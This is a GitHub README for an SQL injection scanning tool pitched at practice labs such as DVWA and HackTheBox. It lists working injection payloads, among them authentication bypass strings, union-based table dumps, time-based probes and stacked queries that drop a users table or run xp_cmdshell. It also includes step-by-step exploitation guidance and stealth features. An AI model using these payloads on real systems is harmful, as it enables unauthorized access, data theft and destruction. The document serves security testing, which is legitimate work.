Skip to content

README.md

Latest commit

Β 

History

History
162 lines (126 loc) Β· 7.1 KB

README.md

File metadata and controls

162 lines (126 loc) Β· 7.1 KB

πŸ”₯ SQLMap-X v5.0 β€” Attacker-Grade SQL Injection Framework

by R0b3rt0 (Robert Mwatua) | πŸ›‘οΈ Professional Security Assessment Tool

Python License Version Status Payloads

πŸš€ A professional-grade, multi-threaded SQL injection detection framework that thinks like a real attacker. Features WAF detection, crawling, GET/POST injection, login bypass testing, and comprehensive reporting with attacker-style exploitation guidance.

Compatible with: DVWA Β· WebGoat Β· HackTheBox Β· TryHackMe Β· VulnBank Β· bWAPP Β· PentesterLab

⚑ Core Features

Category Capabilities
🧠 Detection Methods Error-based, Boolean-based, Time-based, Union-based, Login Bypass, Stacked Queries, Second-Order
πŸ•·οΈ Discovery Web crawling (depth 1-3), Form auto-detection, GET parameter extraction
πŸ›‘οΈ WAF Detection Cloudflare, ModSecurity, AWS WAF, Akamai, Imperva, Sucuri, Barracuda, F5, Wordfence, Fortinet
πŸ”„ Performance Multi-threaded (1-10 threads), Configurable delays, User-Agent rotation
πŸ“Š Reporting JSON + HTML reports, Severity scoring (CRITICAL/HIGH/MEDIUM), Exploitation guidance
🎯 Login Bypass 25+ authentication bypass payloads (admin' --, OR 1=1, UNION bypass, etc.)
πŸ” Stealth Random delays, Proxy support, Custom headers, Auth tokens

πŸ“¦ Installation

# 1. Clone the repository
git clone https://github.com/Robertmwatua/sqlmap-x.git
cd sqlmap-x

# 2. Create virtual environment (recommended)
python3 -m venv sqlmap_env
source sqlmap_env/bin/activate  # On Windows: sqlmap_env\Scripts\activate

# 3. Install dependencies
pip install -r requirements.txt

# 4. Run the tool
python sqli_detector.py






πŸš€ Quick Start
bash
# Interactive wizard (recommended)
python sqli_detector.py

# Example target: OWASP DVWA
# Enter: http://localhost:8080/vulnerabilities/sqli/
# Crawl: y | Depth: 2 | Threads: 3 | Delay: 0.2
🎯 Detection Capabilities
1. Authentication Bypass (CRITICAL)
sql
admin' --
admin' #
' OR '1'='1
admin' OR 1=1--
' UNION SELECT NULL--

2. Error-Based SQLi (HIGH)
sql
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--
' AND 1=CONVERT(int,@@version)--
' AND 1=TO_NUMBER(''')--

3. Time-Based Blind SQLi (HIGH)
sql
' OR SLEEP(5)--
' AND IF(1=1,SLEEP(3),0)--
'; WAITFOR DELAY '00:00:05'--

4. Union-Based SQLi (CRITICAL)
sql
' UNION SELECT NULL--
' UNION SELECT @@version,database()--
' UNION SELECT user(),NULL,NULL--

5. Boolean-Based Blind SQLi (MEDIUM)
sql
' AND 1=1--
' AND 1=2--
' OR '1'='1
6. Stacked Queries (HIGH)

sql
'; DROP TABLE users--
'; SELECT SLEEP(3)--
'; EXEC xp_cmdshell('whoami')--


sqlmap-x/
β”œβ”€β”€ 🐍 sqli_detector.py      # Main tool (2000+ lines)
β”œβ”€β”€ πŸ“¦ requirements.txt       # Dependencies
β”œβ”€β”€ πŸ“– README.md              # Documentation
β”œβ”€β”€ πŸ“‚ reports/               # Generated reports
β”‚   β”œβ”€β”€ sqli_*.json          # JSON findings
β”‚   └── sqli_*.html          # HTML report with guidance
└── βš–οΈ LICENSE                # MIT License

β”Œβ”€[ STEP 1 ]─ INITIALIZING ──────────────────────────────────────
  βœ”  HTTP client ready
└────────────────────────────────────────────────────────────────

β”Œβ”€[ STEP 2 ]─ WAF DETECTION ─────────────────────────────────────
  βœ”  No WAF signatures detected
└────────────────────────────────────────────────────────────────

β”Œβ”€[ STEP 3 ]─ DISCOVERY ─────────────────────────────────────────
  βœ”  Crawled 12 page(s)
  βœ”  Forms: 3  β”‚  GET params: 8
└────────────────────────────────────────────────────────────────

β”Œβ”€[ STEP 4 ]─ INJECTION TESTING ─────────────────────────────────
  Β»  Testing form POST https://target.com/login
  ⚑ [CRITICAL] Authentication Bypass | field=username+password
  ⚑ [HIGH] Error-Based SQLi | field=username
  Β»  Testing GET param [id] https://target.com/page?id=1
  ⚑ [HIGH] Union-Based SQLi (GET) | field=id
└────────────────────────────────────────────────────────────────

β”Œβ”€[ STEP 5 ]─ REPORTS ───────────────────────────────────────────
  βœ”  JSON β†’ reports/sqli_20260413_143022.json
  βœ”  HTML β†’ reports/sqli_20260413_143022.html
└────────────────────────────────────────────────────────────────

  ╔══════════════════════════════════════════════════════════════╗
  β•‘          NEXT STEPS  &  EXPLOITATION GUIDANCE                β•‘
  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

  β‘  LOGIN BYPASS CONFIRMED
  β”Œβ”€ Go to: https://target.com/login
  β”‚  In the username field enter:
  β”‚    admin' --
  β”‚  In the password field enter:
  β”‚    anything
  β”‚  Hit login β€” you should be authenticated as admin.

  β‘‘ UNION-BASED: DATA EXTRACTION
  β”‚  Confirmed column count: 2
  β”‚  Dump all tables:
  β”‚    id=' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables--

══════════════════════════════════════════════════════════════════
  SCAN COMPLETE
══════════════════════════════════════════════════════════════════
  CRITICAL: 1
  HIGH: 2
  Total     : 3
  Forms     : 3
  GET params: 8
  Duration  : 45.23s
══════════════════════════════════════════════════════════════════